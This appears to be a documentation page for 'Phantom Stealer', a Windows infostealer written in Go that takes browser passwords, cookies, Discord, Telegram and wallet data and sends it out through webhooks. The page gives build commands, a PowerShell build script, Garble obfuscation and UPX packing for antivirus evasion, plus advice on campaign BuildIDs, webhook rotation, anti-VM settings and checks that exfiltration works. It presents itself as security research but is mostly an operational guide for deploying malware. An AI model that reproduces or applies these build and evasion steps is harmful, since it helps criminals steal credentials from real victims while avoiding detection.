Skip to main content

Overview

This guide covers all build options for Phantom Stealer, from basic development builds to fully obfuscated production binaries. Understanding build flags and optimization techniques is crucial for effective security research.

Requirements

Minimum Requirements

Go Toolchain

Version: Go 1.21 or higherRequired for compilation. Install from go.dev

Operating System

Platform: Windows (x64)Uses Windows-specific APIs (DPAPI, GDI, Registry)

C Compiler

Compiler: GCC (MinGW-w64)Required for CGO/SQLite3 support

Git

Version Control: Git 2.0+For cloning and version management

Optional Tools

  • Garble - Code obfuscation (recommended for production)
  • UPX - Binary compression
  • PowerShell 5.1+ - For build script automation

Environment Setup

# Verify Go installation
go version
# Should output: go version go1.21+ windows/amd64

# Verify CGO is enabled
go env CGO_ENABLED
# Should output: 1

# Install GCC (if not present)
# Download and install MinGW-w64 from:
# https://www.mingw-w64.org/downloads/

# Set environment variables
set CGO_ENABLED=1
set CC=gcc

# Install optional tools
go install mvdan.cc/garble@latest
CGO must be enabled for SQLite support, which is required for browser database decryption (passwords, cookies, history).

Build Methods

Standard Build

Basic development build with full debug symbols and console output. 
go build -o phantom.exe .
Characteristics:
  • Debug symbols included
  • Console window visible
  • Larger file size (~8-12 MB)
  • Easy to debug
  • Not suitable for production
Use cases:
  • Local development
  • Debugging
  • Testing new features
  • Learning the codebase

Production Build

Optimized build with stripped symbols and hidden console window. 
go build -ldflags "-s -w -H windowsgui" -o phantom.exe .
Build Flags Explained:
  • -ldflags - Pass flags to the linker
  • -s - Strip symbol table (removes debugging symbols)
  • -w - Strip DWARF debug info (removes debug metadata)
  • -H windowsgui - Hide console window (GUI subsystem)
Result:
  • File size reduced by ~30%
  • No console window
  • Harder to debug
  • Still detectable by signature-based AV

Obfuscated Build

Maximum stealth using Garble for code obfuscation. 
garble -literals build -ldflags "-s -w -H windowsgui" -o phantom.exe .
Garble Features:
Obfuscates string literals in the binary. This hides:
  • File paths
  • Registry keys
  • Discord/Telegram API endpoints
  • Wallet extension IDs
  • Configuration strings
// Before obfuscation
path := "AppData\\Roaming\\discord"

// After obfuscation
path := decrypt([]byte{0x42, 0x7f, 0x9a, ...})
Reduces binary size by:
  • Removing reflection data
  • Stripping more metadata
  • Optimizing string storage
garble -literals -tiny build -ldflags "-s -w -H windowsgui" -o phantom.exe .
Controls obfuscation determinism:
  • random - Different output each build (recommended)
  • <value> - Reproducible builds with same seed
garble -literals -seed=random build -o phantom.exe .
Installation: 
go install mvdan.cc/garble@latest

# Verify installation
garble version
Garble requires a clean build environment. Run go clean -cache if you encounter build errors.

Trimpath Build

Remove absolute file paths from the binary to avoid leaking development environment information. 
go build -trimpath -ldflags "-s -w -H windowsgui" -o phantom.exe .
What it removes:
  • Full file paths (e.g., C:\Users\dev\phantom\main.gophantom/main.go)
  • Module cache paths
  • GOROOT paths
Stack trace comparison: 
goroutine 1 [running]:
main.main()
    C:/Users/researcher/go/src/phantom-stealer/main.go:45 +0x123

PowerShell Build Script

The included build.ps1 script automates the build process with multiple options.

Basic Usage

# Standard build
.\build.ps1

# Custom output name
.\build.ps1 -Output mystealer.exe

# Debug build
.\build.ps1 -Debug

# Obfuscated build
.\build.ps1 -Garble

# Full optimization (obfuscation + compression)
.\build.ps1 -Garble -UPX

Script Features

1

Environment Setup

Automatically configures CGO and compiler settings:
build.ps1
# set environment for CGO (required for sqlite3)
$env:CGO_ENABLED = "1"
$env:CC = "gcc"
2

Dependency Management

Downloads and verifies Go dependencies:
build.ps1
Write-Host "[*] Downloading dependencies..." -ForegroundColor Cyan
go mod tidy
if ($LASTEXITCODE -ne 0) {
    Write-Host "[-] Failed to download dependencies" -ForegroundColor Red
    exit 1
}
3

Build Configuration

Applies optimized build flags:
build.ps1
$ldflags = @(
    "-s",           # strip symbol table
    "-w",           # strip DWARF debug info
    "-H=windowsgui" # hide console window
)

if (-not $Debug) {
    $buildflags += "-trimpath"    # remove file paths from binary
    $gcflags = "-l"               # disable inlining for smaller binary
}
4

Obfuscation

Optionally applies Garble obfuscation:
build.ps1
if ($Garble) {
    $garblePath = Get-Command garble -ErrorAction SilentlyContinue
    if ($garblePath) {
        Write-Host "[*] Building with Garble obfuscation..." -ForegroundColor Magenta
        
        $buildCmd = "garble -literals -tiny -seed=random build"
        $buildCmd += " -ldflags=`"$ldflagStr`" -o `"$Output`" ."
        
        Invoke-Expression $buildCmd
    }
}
5

Compression

Optionally compresses with UPX:
build.ps1
if ($UPX) {
    $upxPath = Get-Command upx -ErrorAction SilentlyContinue
    if ($upxPath) {
        Write-Host "[*] Compressing with UPX..." -ForegroundColor Cyan
        upx --best --lzma $Output 2>$null
        
        $newSize = (Get-Item $Output).Length / 1KB
        Write-Host "[+] Compressed: $([math]::Round($newSize, 2)) KB" -ForegroundColor Green
    }
}
6

Security Analysis

Checks for suspicious strings in the output:
build.ps1
# check strings for obvious indicators
$strings = & strings $Output 2>$null | Select-Object -First 100
$badStrings = @("phantom", "stealer", "password", "cookie", "discord", "telegram")
$found = @()
foreach ($bad in $badStrings) {
    if ($strings -match $bad) {
        $found += $bad
    }
}

if ($found.Count -gt 0) {
    Write-Host "[!] Warning: Found suspicious strings in binary:" -ForegroundColor Yellow
    Write-Host "    $($found -join ', ')" -ForegroundColor Yellow
    Write-Host "[!] Consider using Garble for obfuscation" -ForegroundColor Yellow
}

Script Parameters

ParameterTypeDefaultDescription
-OutputStringphantom.exeOutput filename
-DebugSwitchfalseBuild with debug symbols
-GarbleSwitchfalseEnable Garble obfuscation
-UPXSwitchfalseCompress with UPX
# Debug build with console output
.\build.ps1 -Output phantom-dev.exe -Debug

Build Flags Reference

Go Build Flags

Specifies the output filename.
go build -o phantom.exe .
Pass flags to the Go linker.Common flags:
  • -s - Strip symbol table
  • -w - Strip DWARF debug info
  • -H windowsgui - Build GUI subsystem (no console)
  • -X <var>=<value> - Set variable at link time
go build -ldflags "-s -w -H windowsgui" .
Pass flags to the Go compiler.Common flags:
  • -l - Disable inlining
  • -N - Disable optimizations
  • -m - Print optimization decisions
go build -gcflags="-l" .
Remove absolute file paths from the compiled binary.
go build -trimpath .
Build with conditional compilation tags.
go build -tags "prod,release" .

Garble Flags

Obfuscate string literals and constant expressions.Impact: Hides hardcoded strings from static analysis.
garble -literals build .
Optimize for smaller binary size.Impact: Removes reflection metadata, reduces size by 10-20%.
garble -tiny build .
Control obfuscation reproducibility.Values:
  • random - Different output each build
  • <number> - Reproducible with same seed
garble -seed=random build .
Generate debug information to a directory.Use case: Debug obfuscated builds.
garble -debugdir=./debug build .

Advanced Techniques

Variable Injection

Set configuration at build time using -ldflags -X: 
go build -ldflags "-X 'phantom/config.DiscordWebhook=https://...' -X 'phantom/config.BuildID=campaign-001'" .
Benefits:
  • No need to edit config.go
  • Different configs per build
  • Scriptable deployment

Cross-Compilation

Build for different architectures: 
# 64-bit Windows (default)
set GOOS=windows
set GOARCH=amd64
go build -o phantom-x64.exe .

# 32-bit Windows
set GOOS=windows
set GOARCH=386
go build -o phantom-x86.exe .
32-bit builds may have compatibility issues with some Windows APIs. Always test thoroughly.

Static Linking

For maximum portability: 
set CGO_ENABLED=0
go build -ldflags "-s -w -H windowsgui -extldflags '-static'" -o phantom.exe .
Static linking increases binary size but eliminates dependency on system DLLs.

UPX Compression

Compress the final binary: 
# Build first
go build -ldflags "-s -w -H windowsgui" -o phantom.exe .

# Compress with UPX
upx --best --lzma phantom.exe

# Result: 30-50% size reduction
UPX Options:
  • --best - Maximum compression
  • --lzma - Use LZMA algorithm
  • --ultra-brute - Extreme compression (slow)
UPX-compressed binaries are easily detected by AV. Consider custom packers for production use.

Build Optimization

Size Optimization

Minimize binary size: 
garble -literals -tiny build -trimpath -ldflags "-s -w -H windowsgui" -o phantom.exe .
upx --best --lzma phantom.exe
Typical sizes:
  • Standard build: 12 MB
  • Optimized build: 8 MB
  • Garble + UPX: 3-4 MB

Stealth Optimization

Maximize evasion: 
# Use random seed for unique binaries
garble -literals -tiny -seed=random build -trimpath -ldflags "-s -w -H windowsgui" -o phantom.exe .

# Verify no suspicious strings
strings phantom.exe | grep -i "phantom\|stealer\|password\|discord"

Debug Optimization

Easier debugging: 
# Keep symbols, show console
go build -gcflags="-N -l" -o phantom-debug.exe .

# Run with race detector
go build -race -o phantom-debug.exe .

Verification

Build Verification Checklist

1

File Properties

# Check file size
(Get-Item phantom.exe).Length / 1MB
# Should be under 10MB for optimized builds

# Check hash
(Get-FileHash phantom.exe -Algorithm SHA256).Hash
2

String Analysis

# Check for suspicious strings
strings phantom.exe | findstr /i "phantom stealer password discord telegram"
# Should return nothing for obfuscated builds
3

Import Analysis

# Check imported DLLs
dumpbin /imports phantom.exe
# Should see: kernel32.dll, ntdll.dll, user32.dll, etc.
4

Subsystem Check

# Verify GUI subsystem
dumpbin /headers phantom.exe | findstr "subsystem"
# Should show: subsystem : 2 (Windows GUI)
5

Functional Test

# Test execution
.\phantom.exe
# Should run silently with no console output

Common Issues

Build Errors

Error: sqlite3: Binary was compiled with 'CGO_ENABLED=0'Solution:
set CGO_ENABLED=1
go clean -cache
go build .
Error: gcc: command not foundSolution:
  • Install MinGW-w64
  • Add to PATH: C:\mingw-w64\bin
  • Verify: gcc --version
Error: garble: cannot find main moduleSolution:
go mod init phantom
go mod tidy
go clean -cache
garble build .
Error: Linker error with Windows API functionsSolution:
# Ensure CGO is enabled
set CGO_ENABLED=1
# Add missing libraries
go build -ldflags "-H windowsgui -extldflags '-lgdi32 -luser32'" .

Runtime Issues

Cause: Anti-analysis checks detecting VM/debuggerSolution: Build with debug config:
config/config.go
AntiVM    = false
AntiDebug = false
Cause: Missing runtime dependenciesSolution:
# Check dependencies
dumpbin /dependents phantom.exe
# Ensure all DLLs are present or use static linking
Cause: DPAPI decryption requires target user contextSolution: Run as the target user, not Administrator

Best Practices

Development

  • Use -Debug flag
  • Keep symbols for debugging
  • Disable anti-analysis
  • Use console output

Testing

  • Standard optimized build
  • Enable anti-analysis
  • Test on clean VMs
  • Verify data exfiltration

Production

  • Use Garble obfuscation
  • Random seed per build
  • Remove all debug output
  • Test on multiple systems

Security

  • Never commit compiled binaries
  • Rotate webhook URLs
  • Change mutex names
  • Unique BuildID per campaign

Build Recipes

Quick Development Build

go build -o phantom-dev.exe .

Optimized Test Build

go build -trimpath -ldflags "-s -w -H windowsgui" -o phantom-test.exe .

Production Stealth Build

# Clean environment
go clean -cache

# Build with maximum obfuscation
garble -literals -tiny -seed=random build -trimpath -ldflags "-s -w -H windowsgui" -o phantom.exe .

# Optional: Compress
upx --best --lzma phantom.exe

# Verify
strings phantom.exe | grep -i stealer

Automated PowerShell Build

# One-command production build
.\build.ps1 -Output phantom.exe -Garble -UPX

Next Steps

Quick Start

Run your first build and test data collection

Configuration

Customize modules, targets, and persistence options

Core Modules

Understand the module design and implementation

Security Research

Learn about detection and defense strategies
For maximum stealth, use different build configurations for each deployment and rotate all identifiable strings (BuildID, MutexName, webhook URLs).

Build docs developers (and LLMs) love

Get started for freeTalk to us